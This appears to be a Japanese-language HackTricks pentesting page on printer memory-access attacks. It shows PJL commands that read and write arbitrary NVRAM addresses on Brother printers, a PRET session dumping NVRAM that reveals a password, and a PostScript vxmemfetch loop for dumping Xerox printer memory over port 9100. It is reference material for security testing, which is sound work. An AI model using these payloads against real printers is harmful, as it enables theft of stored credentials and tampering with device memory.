hacktricks/network-services-pentesting/pentesting-printers/memory-access.md

4.3 KiB
Raw Blame History

AWSハッキングをゼロからヒーローまで学ぶ htARTE (HackTricks AWS Red Team Expert)

HackTricksをサポートする他の方法:

NVRAMをダンプして、そこから機密情報パスワードなどを抽出することができます。

PJL (Brother) では、以下に示すようにPJLを使用して任意のNVRAMアドレスにアクセスできます:

@PJL RNVRAM ADDRESS = X              # read byte at location X
@PJL WNVRAM ADDRESS = X DATA = Y     # write byte Y to location X

この攻撃をテストするには、PRETを使用できます:

./pret.py -q printer pjl
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> nvram dump
Writing copy to nvram/printer
................................................................................
................................................................................
............................................MyS3cretPassw0rd....................
................................................................................

特定のXeroxプリンターモデルには、攻撃者が任意のメモリアドレスを読み取ることを可能にする独自のPostScript vxmemfetchオペレータが組み込まれています。PostScriptループを使用すると、以下に示すように、メモリ全体を簡単にダンプすることができますPRETにはこの攻撃はありませんので、このペイロードをnc接続でポート9100に送信する必要があります

/counter 0 def 50000 {
/counter counter 1 add def
currentdict /RRCustomProcs /ProcSet findresource begin
begin counter 1 false vxmemfetch end end == counter
} repeat

詳細はこちら: http://hacking-printers.net/wiki/index.php/Memory_access

htARTE (HackTricks AWS Red Team Expert)でAWSハッキングをゼロからヒーローまで学ぶ

HackTricksをサポートする他の方法: